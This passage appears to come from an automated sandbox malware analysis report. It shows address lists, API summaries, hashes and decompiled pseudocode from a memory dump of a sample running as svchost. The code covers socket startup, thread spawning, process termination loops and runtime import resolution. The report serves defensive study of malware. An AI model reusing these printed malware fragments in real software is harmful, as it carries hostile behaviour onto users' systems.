                                                                                                                                                                                                                                                    						__eflags = _t138;
                                                                                                                                                                                                                                                    					} while (_t138 != 0);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}























































                                                                                                                                                                                                                                                    0x0408bf20
                                                                                                                                                                                                                                                    0x0408bf21
                                                                                                                                                                                                                                                    0x0408bf26
                                                                                                                                                                                                                                                    0x0408bf26
                                                                                                                                                                                                                                                    0x0408bf2c
                                                                                                                                                                                                                                                    0x0408bf3a
                                                                                                                                                                                                                                                    0x0408bf3a
                                                                                                                                                                                                                                                    0x0408bf3c
                                                                                                                                                                                                                                                    0x0408bf3f
                                                                                                                                                                                                                                                    0x0408bf41
                                                                                                                                                                                                                                                    0x0408bf41
                                                                                                                                                                                                                                                    0x0408bf30
                                                                                                                                                                                                                                                    0x0408bf32
                                                                                                                                                                                                                                                    0x0408bf33
                                                                                                                                                                                                                                                    0x0408bf35
                                                                                                                                                                                                                                                    0x0408bf35
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0408bf35
                                                                                                                                                                                                                                                    0x0408bf43
                                                                                                                                                                                                                                                    0x0408bf48
                                                                                                                                                                                                                                                    0x0408bf48
                                                                                                                                                                                                                                                    0x0408bf4a
                                                                                                                                                                                                                                                    0x0408bf4c
                                                                                                                                                                                                                                                    0x0408bf4e
                                                                                                                                                                                                                                                    0x0408bf51
                                                                                                                                                                                                                                                    0x0408bf51
                                                                                                                                                                                                                                                    0x0408bf53
                                                                                                                                                                                                                                                    0x0408bf55
                                                                                                                                                                                                                                                    0x0408bf55
                                                                                                                                                                                                                                                    0x0408bf57
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0408bf59
                                                                                                                                                                                                                                                    0x0408bf59
                                                                                                                                                                                                                                                    0x0408bf83
                                                                                                                                                                                                                                                    0x0408bf83
                                                                                                                                                                                                                                                    0x0408bf85
                                                                                                                                                                                                                                                    0x0408bf85
                                                                                                                                                                                                                                                    0x0408bf88
                                                                                                                                                                                                                                                    0x0408bf9b
                                                                                                                                                                                                                                                    0x0408bf9b
                                                                                                                                                                                                                                                    0x0408bf9d
                                                                                                                                                                                                                                                    0x0408bf9f
                                                                                                                                                                                                                                                    0x0408bfa1
                                                                                                                                                                                                                                                    0x0408bfa4
                                                                                                                                                                                                                                                    0x0408bfa4
                                                                                                                                                                                                                                                    0x0408bfa6
                                                                                                                                                                                                                                                    0x0408bfa6
                                                                                                                                                                                                                                                    0x0408bf74
                                                                                                                                                                                                                                                    0x0408bf74
                                                                                                                                                                                                                                                    0x0408bf74
                                                                                                                                                                                                                                                    0x0408bf76
                                                                                                                                                                                                                                                    0x0408bf78
                                                                                                                                                                                                                                                    0x0408bf7a
                                                                                                                                                                                                                                                    0x0408bf7d
                                                                                                                                                                                                                                                    0x0408bf7d
                                                                                                                                                                                                                                                    0x0408bf7f
                                                                                                                                                                                                                                                    0x0408bfd5
                                                                                                                                                                                                                                                    0x0408bfd5
                                                                                                                                                                                                                                                    0x0408bfdb
                                                                                                                                                                                                                                                    0x0408bfde
                                                                                                                                                                                                                                                    0x0408bfe1
                                                                                                                                                                                                                                                    0x0408bfe4
                                                                                                                                                                                                                                                    0x0408bff4
                                                                                                                                                                                                                                                    0x0408bff4
                                                                                                                                                                                                                                                    0x0408bff6
                                                                                                                                                                                                                                                    0x0408bff9
                                                                                                                                                                                                                                                    0x0408bffb
                                                                                                                                                                                                                                                    0x0408bffe
                                                                                                                                                                                                                                                    0x0408bffe
                                                                                                                                                                                                                                                    0x0408bffe
                                                                                                                                                                                                                                                    0x0408c003
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0408bfe6
                                                                                                                                                                                                                                                    0x0408bfe6
                                                                                                                                                                                                                                                    0x0408bfe6
                                                                                                                                                                                                                                                    0x0408bfe8
                                                                                                                                                                                                                                                    0x0408bfe9
                                                                                                                                                                                                                                                    0x0408bfeb
                                                                                                                                                                                                                                                    0x0408bfec
                                                                                                                                                                                                                                                    0x0408bfec
                                                                                                                                                                                                                                                    0x0408bfec
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0408bfef
                                                                                                                                                                                                                                                    0x0408bfa8
                                                                                                                                                                                                                                                    0x0408bfa9
                                                                                                                                                                                                                                                    0x0408bfa9
                                                                                                                                                                                                                                                    0x0408bfab
                                                                                                                                                                                                                                                    0x0408bfad
                                                                                                                                                                                                                                                    0x0408bfaf
                                                                                                                                                                                                                                                    0x0408bfb2
                                                                                                                                                                                                                                                    0x0408bfb2
                                                                                                                                                                                                                                                    0x0408bfb4
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0408bfb6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0408bfb6
                                                                                                                                                                                                                                                    0x0408bfb6
                                                                                                                                                                                                                                                    0x0408bfb6
                                                                                                                                                                                                                                                    0x0408bfb6
                                                                                                                                                                                                                                                    0x0408bfb6
                                                                                                                                                                                                                                                    0x0408bfb8
                                                                                                                                                                                                                                                    0x0408bfba
                                                                                                                                                                                                                                                    0x0408bfbc
                                                                                                                                                                                                                                                    0x0408bfbf
                                                                                                                                                                                                                                                    0x0408bfbf
                                                                                                                                                                                                                                                    0x0408bfc1
                                                                                                                                                                                                                                                    0x0408bfc3
                                                                                                                                                                                                                                                    0x0408bfc3
                                                                                                                                                                                                                                                    0x0408bfc3
                                                                                                                                                                                                                                                    0x0408bfc7
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0408bfc9
                                                                                                                                                                                                                                                    0x0408bfcb
                                                                                                                                                                                                                                                    0x0408bfcb
                                                                                                                                                                                                                                                    0x0408bfce
                                                                                                                                                                                                                                                    0x0408bfce
                                                                                                                                                                                                                                                    0x0408bfd2
                                                                                                                                                                                                                                                    0x0408bfd2
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0408bfd2
                                                                                                                                                                                                                                                    0x0408bfb4
                                                                                                                                                                                                                                                    0x0408bf8d
                                                                                                                                                                                                                                                    0x0408bf8f
                                                                                                                                                                                                                                                    0x0408bf90
                                                                                                                                                                                                                                                    0x0408bf90
                                                                                                                                                                                                                                                    0x0408bf93
                                                                                                                                                                                                                                                    0x0408c00a
                                                                                                                                                                                                                                                    0x0408c00b
                                                                                                                                                                                                                                                    0x0408c00d
                                                                                                                                                                                                                                                    0x0408c012
                                                                                                                                                                                                                                                    0x0408c012
                                                                                                                                                                                                                                                    0x0408c012
                                                                                                                                                                                                                                                    0x0408c012
                                                                                                                                                                                                                                                    0x0408c014
                                                                                                                                                                                                                                                    0x0408c017
                                                                                                                                                                                                                                                    0x0408c017
                                                                                                                                                                                                                                                    0x0408c01b
                                                                                                                                                                                                                                                    0x0408c01b
                                                                                                                                                                                                                                                    0x0408c029
                                                                                                                                                                                                                                                    0x0408c035
                                                                                                                                                                                                                                                    0x0408c037
                                                                                                                                                                                                                                                    0x0408c03c
                                                                                                                                                                                                                                                    0x0408c03e
                                                                                                                                                                                                                                                    0x0408c03e
                                                                                                                                                                                                                                                    0x0408c044
                                                                                                                                                                                                                                                    0x0408c044
                                                                                                                                                                                                                                                    0x0408c046
                                                                                                                                                                                                                                                    0x0408c046
                                                                                                                                                                                                                                                    0x0408c048
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0408c04a
                                                                                                                                                                                                                                                    0x0408c054
                                                                                                                                                                                                                                                    0x0408c057
                                                                                                                                                                                                                                                    0x0408c057
                                                                                                                                                                                                                                                    0x0408c060
                                                                                                                                                                                                                                                    0x0408c061
                                                                                                                                                                                                                                                    0x0408c063
                                                                                                                                                                                                                                                    0x0408c064
                                                                                                                                                                                                                                                    0x0408c066
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0408c06a
                                                                                                                                                                                                                                                    0x0408c070
                                                                                                                                                                                                                                                    0x0408c071
                                                                                                                                                                                                                                                    0x0408c071
                                                                                                                                                                                                                                                    0x0408c072
                                                                                                                                                                                                                                                    0x0408c075
                                                                                                                                                                                                                                                    0x0408c07e
                                                                                                                                                                                                                                                    0x0408c07e
                                                                                                                                                                                                                                                    0x0408c080
                                                                                                                                                                                                                                                    0x0408c089
                                                                                                                                                                                                                                                    0x0408c089
                                                                                                                                                                                                                                                    0x0408c082
                                                                                                                                                                                                                                                    0x0408c084
                                                                                                                                                                                                                                                    0x0408c084
                                                                                                                                                                                                                                                    0x0408c061
                                                                                                                                                                                                                                                    0x0408c08f
                                                                                                                                                                                                                                                    0x0408c08f
                                                                                                                                                                                                                                                    0x0408c092
                                                                                                                                                                                                                                                    0x0408c092
                                                                                                                                                                                                                                                    0x0408c095
                                                                                                                                                                                                                                                    0x0408c099
                                                                                                                                                                                                                                                    0x0408c09a
                                                                                                                                                                                                                                                    0x0408c09a
                                                                                                                                                                                                                                                    0x0408c09c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0408c09e
                                                                                                                                                                                                                                                    0x0408c0a0
                                                                                                                                                                                                                                                    0x0408c0b8
                                                                                                                                                                                                                                                    0x0408c0bb
                                                                                                                                                                                                                                                    0x0408c0bb
                                                                                                                                                                                                                                                    0x0408c0a2
                                                                                                                                                                                                                                                    0x0408c0a8
                                                                                                                                                                                                                                                    0x0408c0af
                                                                                                                                                                                                                                                    0x0408c0af
                                                                                                                                                                                                                                                    0x0408c0c0
                                                                                                                                                                                                                                                    0x0408c0c0
                                                                                                                                                                                                                                                    0x0408c0c6
                                                                                                                                                                                                                                                    0x0408c0c6
                                                                                                                                                                                                                                                    0x0408c0cc
                                                                                                                                                                                                                                                    0x0408c0d1
                                                                                                                                                                                                                                                    0x0408c0d7
                                                                                                                                                                                                                                                    0x0408c0d9
                                                                                                                                                                                                                                                    0x0408c0d9
                                                                                                                                                                                                                                                    0x0408c0df
                                                                                                                                                                                                                                                    0x0408c0e2
                                                                                                                                                                                                                                                    0x0408c0e2
                                                                                                                                                                                                                                                    0x0408c0e2
                                                                                                                                                                                                                                                    0x0408c0e6
                                                                                                                                                                                                                                                    0x0408c0e7
                                                                                                                                                                                                                                                    0x0408c0ec
                                                                                                                                                                                                                                                    0x0408c0ef
                                                                                                                                                                                                                                                    0x0408c0f0
                                                                                                                                                                                                                                                    0x0408c0f4
                                                                                                                                                                                                                                                    0x0408c0f4
                                                                                                                                                                                                                                                    0x0408c0f6
                                                                                                                                                                                                                                                    0x0408c0f6
                                                                                                                                                                                                                                                    0x0408c0fa
                                                                                                                                                                                                                                                    0x04001780
                                                                                                                                                                                                                                                    0x04001781
                                                                                                                                                                                                                                                    0x04001783
                                                                                                                                                                                                                                                    0x04001789
                                                                                                                                                                                                                                                    0x0400178f
                                                                                                                                                                                                                                                    0x04001790
                                                                                                                                                                                                                                                    0x04001795
                                                                                                                                                                                                                                                    0x0400179a
                                                                                                                                                                                                                                                    0x0400179c
                                                                                                                                                                                                                                                    0x040019a0
                                                                                                                                                                                                                                                    0x040019a2
                                                                                                                                                                                                                                                    0x040019a2
                                                                                                                                                                                                                                                    0x040017a2
                                                                                                                                                                                                                                                    0x040017ac
                                                                                                                                                                                                                                                    0x040017b6
                                                                                                                                                                                                                                                    0x040017b6
                                                                                                                                                                                                                                                    0x040017bb
                                                                                                                                                                                                                                                    0x040017c1
                                                                                                                                                                                                                                                    0x040017c8
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040017ce
                                                                                                                                                                                                                                                    0x040017d8
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040017ec
                                                                                                                                                                                                                                                    0x040017ff
                                                                                                                                                                                                                                                    0x04001804
                                                                                                                                                                                                                                                    0x04001807
                                                                                                                                                                                                                                                    0x0400180d
                                                                                                                                                                                                                                                    0x04001814
                                                                                                                                                                                                                                                    0x04001822
                                                                                                                                                                                                                                                    0x0400182c
                                                                                                                                                                                                                                                    0x04001831
                                                                                                                                                                                                                                                    0x04001834
                                                                                                                                                                                                                                                    0x04001840
                                                                                                                                                                                                                                                    0x04001859
                                                                                                                                                                                                                                                    0x04001867
                                                                                                                                                                                                                                                    0x04001870
                                                                                                                                                                                                                                                    0x0400188b
                                                                                                                                                                                                                                                    0x0400188b
                                                                                                                                                                                                                                                    0x04001891
                                                                                                                                                                                                                                                    0x040018ac
                                                                                                                                                                                                                                                    0x040018ac
                                                                                                                                                                                                                                                    0x040018b3
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040018cd
                                                                                                                                                                                                                                                    0x040018d2
                                                                                                                                                                                                                                                    0x040018d5
                                                                                                                                                                                                                                                    0x040018db
                                                                                                                                                                                                                                                    0x040018e2
                                                                                                                                                                                                                                                    0x040018f4
                                                                                                                                                                                                                                                    0x040018fe
                                                                                                                                                                                                                                                    0x04001903
                                                                                                                                                                                                                                                    0x04001906
                                                                                                                                                                                                                                                    0x04001912
                                                                                                                                                                                                                                                    0x0400191e
                                                                                                                                                                                                                                                    0x0400191e
                                                                                                                                                                                                                                                    0x04001931
                                                                                                                                                                                                                                                    0x0400193f
                                                                                                                                                                                                                                                    0x04001948
                                                                                                                                                                                                                                                    0x04001963
                                                                                                                                                                                                                                                    0x04001963
                                                                                                                                                                                                                                                    0x040018a3
                                                                                                                                                                                                                                                    0x040018a3
                                                                                                                                                                                                                                                    0x040018a6
                                                                                                                                                                                                                                                    0x040018a6
                                                                                                                                                                                                                                                    0x04001976
                                                                                                                                                                                                                                                    0x04001981
                                                                                                                                                                                                                                                    0x0400199b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400198b
                                                                                                                                                                                                                                                    0x04001990
                                                                                                                                                                                                                                                    0x04001996
                                                                                                                                                                                                                                                    0x040017b6
                                                                                                                                                                                                                                                    0x0408bf97
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0408bf97
                                                                                                                                                                                                                                                    0x0408bf5b
                                                                                                                                                                                                                                                    0x0408bf5d
                                                                                                                                                                                                                                                    0x0408bf60
                                                                                                                                                                                                                                                    0x0408bf62
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0408bf64
                                                                                                                                                                                                                                                    0x0408bf64
                                                                                                                                                                                                                                                    0x0408bf65
                                                                                                                                                                                                                                                    0x0408bf67
                                                                                                                                                                                                                                                    0x0408bf69
                                                                                                                                                                                                                                                    0x0408bf6b
                                                                                                                                                                                                                                                    0x0408bf6e
                                                                                                                                                                                                                                                    0x0408bf6e
                                                                                                                                                                                                                                                    0x0408bf70
                                                                                                                                                                                                                                                    0x0408bf48
                                                                                                                                                                                                                                                    0x0408bf4a
                                                                                                                                                                                                                                                    0x0408bf4c
                                                                                                                                                                                                                                                    0x0408bf4e
                                                                                                                                                                                                                                                    0x0408bf51
                                                                                                                                                                                                                                                    0x0408bf51
                                                                                                                                                                                                                                                    0x0408bf53
                                                                                                                                                                                                                                                    0x0408bf55
                                                                                                                                                                                                                                                    0x0408bf55
                                                                                                                                                                                                                                                    0x0408bf57
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0408bf57
                                                                                                                                                                                                                                                    0x0408bf36
                                                                                                                                                                                                                                                    0x0408bf36
                                                                                                                                                                                                                                                    0x0408bf36
                                                                                                                                                                                                                                                    0x0408bf36
                                                                                                                                                                                                                                                    0x0408bf41

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 0408C05A
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,04089FF9), ref: 0408C078
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32(?,04089FF9), ref: 0408C089
                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(04000000,00001000,00000004,?,00000000), ref: 0408C0D7
                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(04000000,00001000), ref: 0408C0EC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1996367037-0
                                                                                                                                                                                                                                                    • Opcode ID: 64764ee8238996737652da89ce96f32c0f690e677ce2c9ab463374656e08a4d0
                                                                                                                                                                                                                                                    • Instruction ID: 20fcce43128c80cbc216fde34acc2cdd335751d52faa48733a5718032d389bea
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64764ee8238996737652da89ce96f32c0f690e677ce2c9ab463374656e08a4d0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA51F6716542525BE720AEB8CEC0664B7F0EB02264718073DE5E5EB3C3EBA0B8059F61
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                                    			E04001780() {
                                                                                                                                                                                                                                                    				char _v404;
                                                                                                                                                                                                                                                    				signed int _v408;
                                                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v412;
                                                                                                                                                                                                                                                    				intOrPtr _v416;
                                                                                                                                                                                                                                                    				intOrPtr _v420;
                                                                                                                                                                                                                                                    				void* _v424;
                                                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v428;
                                                                                                                                                                                                                                                    				intOrPtr _v432;
                                                                                                                                                                                                                                                    				void* _v436;
                                                                                                                                                                                                                                                    				void* _v440;
                                                                                                                                                                                                                                                    				void* _v444;
                                                                                                                                                                                                                                                    				char* _t51;
                                                                                                                                                                                                                                                    				intOrPtr _t52;
                                                                                                                                                                                                                                                    				intOrPtr _t54;
                                                                                                                                                                                                                                                    				intOrPtr _t57;
                                                                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                                                                    				void* _t90;
                                                                                                                                                                                                                                                    				void* _t91;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t51 =  &_v404;
                                                                                                                                                                                                                                                    				_push(_t51);
                                                                                                                                                                                                                                                    				_push(0x202); // executed
                                                                                                                                                                                                                                                    				L0400100C(); // executed
                                                                                                                                                                                                                                                    				if(_t51 != 0) {
                                                                                                                                                                                                                                                    					L16:
                                                                                                                                                                                                                                                    					ExitProcess(0);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_v408 = 0;
                                                                                                                                                                                                                                                    				_v412 = 0;
                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                    					_t52 = E04001490(); // executed
                                                                                                                                                                                                                                                    					_v416 = _t52;
                                                                                                                                                                                                                                                    					if(_v416 > 0 && _v416 < 0x2710) {
                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					Sleep(0x7530);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				 *0x4088c2c = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                    				_t54 = E040023E0( *((intOrPtr*)(0x4088c1c + _v408 * 4))); // executed
                                                                                                                                                                                                                                                    				_t91 = _t90 + 4;
                                                                                                                                                                                                                                                    				_v420 = _t54;
                                                                                                                                                                                                                                                    				if(_v420 != 0) {
                                                                                                                                                                                                                                                    					E04001DC0(_v420, 0x4085600); // executed
                                                                                                                                                                                                                                                    					_t68 = E04001470(0xc);
                                                                                                                                                                                                                                                    					_t91 = _t91 + 0xc;
                                                                                                                                                                                                                                                    					_v440 = _t68;
                                                                                                                                                                                                                                                    					_v424 = _v440;
                                                                                                                                                                                                                                                    					 *_v424 =  *(0x4088c1c + _v408 * 4);
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_v424 + 4)) = _v420;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_v424 + 8)) = 0x4085600;
                                                                                                                                                                                                                                                    					CreateThread(0, 0, E04001630, _v424, 0, 0); // executed
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_v428 = 0;
                                                                                                                                                                                                                                                    				while(_v428 < 3) {
                                                                                                                                                                                                                                                    					_t57 = E040023E0( *((intOrPtr*)(0x4088c20 + (_v412 + _v428) * 4))); // executed
                                                                                                                                                                                                                                                    					_t91 = _t91 + 4;
                                                                                                                                                                                                                                                    					_v432 = _t57;
                                                                                                                                                                                                                                                    					if(_v432 != 0) {
                                                                                                                                                                                                                                                    						E04001DC0(_v432, 0x4085600); // executed
                                                                                                                                                                                                                                                    						_t62 = E04001470(0xc);
                                                                                                                                                                                                                                                    						_t91 = _t91 + 0xc;
                                                                                                                                                                                                                                                    						_v444 = _t62;
                                                                                                                                                                                                                                                    						_v436 = _v444;
                                                                                                                                                                                                                                                    						 *_v436 =  *(0x4088c20 + (_v412 + _v428) * 4);
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_v436 + 4)) = _v432;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_v436 + 8)) = 0x4085600;
                                                                                                                                                                                                                                                    						CreateThread(0, 0, E04001630, _v436, 0, 0); // executed
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v428 =  &(_v428->nLength);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				WaitForSingleObject( *0x4088c2c, 0xffffffff);
                                                                                                                                                                                                                                                    				Sleep(0x9c40);
                                                                                                                                                                                                                                                    				L04001006();
                                                                                                                                                                                                                                                    				goto L16;
                                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                                    0x04001789
                                                                                                                                                                                                                                                    0x0400178f
                                                                                                                                                                                                                                                    0x04001790
                                                                                                                                                                                                                                                    0x04001795
                                                                                                                                                                                                                                                    0x0400179c
                                                                                                                                                                                                                                                    0x040019a0
                                                                                                                                                                                                                                                    0x040019a2
                                                                                                                                                                                                                                                    0x040019a2
                                                                                                                                                                                                                                                    0x040017a2
                                                                                                                                                                                                                                                    0x040017ac
                                                                                                                                                                                                                                                    0x040017b6
                                                                                                                                                                                                                                                    0x040017b6
                                                                                                                                                                                                                                                    0x040017bb
                                                                                                                                                                                                                                                    0x040017c8
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001990
                                                                                                                                                                                                                                                    0x04001996
                                                                                                                                                                                                                                                    0x040017ec
                                                                                                                                                                                                                                                    0x040017ff
                                                                                                                                                                                                                                                    0x04001804
                                                                                                                                                                                                                                                    0x04001807
                                                                                                                                                                                                                                                    0x04001814
                                                                                                                                                                                                                                                    0x04001822
                                                                                                                                                                                                                                                    0x0400182c
                                                                                                                                                                                                                                                    0x04001831
                                                                                                                                                                                                                                                    0x04001834
                                                                                                                                                                                                                                                    0x04001840
                                                                                                                                                                                                                                                    0x04001859
                                                                                                                                                                                                                                                    0x04001867
                                                                                                                                                                                                                                                    0x04001870
                                                                                                                                                                                                                                                    0x0400188b
                                                                                                                                                                                                                                                    0x0400188b
                                                                                                                                                                                                                                                    0x04001891
                                                                                                                                                                                                                                                    0x040018ac
                                                                                                                                                                                                                                                    0x040018cd
                                                                                                                                                                                                                                                    0x040018d2
                                                                                                                                                                                                                                                    0x040018d5
                                                                                                                                                                                                                                                    0x040018e2
                                                                                                                                                                                                                                                    0x040018f4
                                                                                                                                                                                                                                                    0x040018fe
                                                                                                                                                                                                                                                    0x04001903
                                                                                                                                                                                                                                                    0x04001906
                                                                                                                                                                                                                                                    0x04001912
                                                                                                                                                                                                                                                    0x04001931
                                                                                                                                                                                                                                                    0x0400193f
                                                                                                                                                                                                                                                    0x04001948
                                                                                                                                                                                                                                                    0x04001963
                                                                                                                                                                                                                                                    0x04001963
                                                                                                                                                                                                                                                    0x040018a6
                                                                                                                                                                                                                                                    0x040018a6
                                                                                                                                                                                                                                                    0x04001976
                                                                                                                                                                                                                                                    0x04001981
                                                                                                                                                                                                                                                    0x0400199b
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 04001795
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 040019A2
                                                                                                                                                                                                                                                      • Part of subcall function 04001490: lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                      • Part of subcall function 04001490: GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                      • Part of subcall function 04001490: closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040017E6
                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 0400188B
                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 04001963
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04001976
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40), ref: 04001981
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00007530), ref: 04001990
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Create$SleepThread$CountEventExitObjectProcessSingleStartupTickWaitclosesocketlstrcat
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1305884959-0
                                                                                                                                                                                                                                                    • Opcode ID: a41e2e6088094ddaf64ef43a59fc0f2982de2e99ed4e0b2c61c148b4799e462e
                                                                                                                                                                                                                                                    • Instruction ID: 2f7e3e578d268ca83db2a9f917eba75e9ec579b5eb93670916da3db20cf0bcb8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a41e2e6088094ddaf64ef43a59fc0f2982de2e99ed4e0b2c61c148b4799e462e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14512674A01224AFFB60EF60DC59BDAB7B0AB49708F0480E8E5497B2C0D7756E84CF52
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 93 4001630-400163a 94 4001640-4001662 CoInitialize 93->94 95 400176c-4001771 93->95 96 4001766 94->96 97 4001668 94->97 96->95 98 400166f-4001676 97->98 98->96 99 400167c-400168d WaitForSingleObject 98->99 100 40016a3-40016bd GetExitCodeProcess 99->100 101 400168f-400169e TerminateProcess 99->101 102 4001761 100->102 103 40016c3-40016ca 100->103 101->96 102->98 104 40016dc-40016e3 103->104 105 40016cc-40016d7 Sleep 103->105 106 40016e5-40016f2 SetEvent 104->106 107 40016f6-4001733 CloseHandle Sleep call 40023e0 104->107 105->102 106->96 110 4001735 107->110 111 4001739-4001749 107->111 110->96 111->102 112 400174b-400175e call 4001dc0 111->112 112->102
                                                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                                                    			E04001630(intOrPtr* _a4) {
                                                                                                                                                                                                                                                    				intOrPtr* _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				long _v16;
                                                                                                                                                                                                                                                    				int _v20;
                                                                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                                                                    				int _t40;
                                                                                                                                                                                                                                                    				void* _t44;
                                                                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				if(_a4 == 0) {
                                                                                                                                                                                                                                                    					L17:
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				 *0x4003090(0); // executed
                                                                                                                                                                                                                                                    				_v12 = 0x3e8;
                                                                                                                                                                                                                                                    				_v16 = 0x1388;
                                                                                                                                                                                                                                                    				_v8 = _a4;
                                                                                                                                                                                                                                                    				if( *_v8 == 0) {
                                                                                                                                                                                                                                                    					L16:
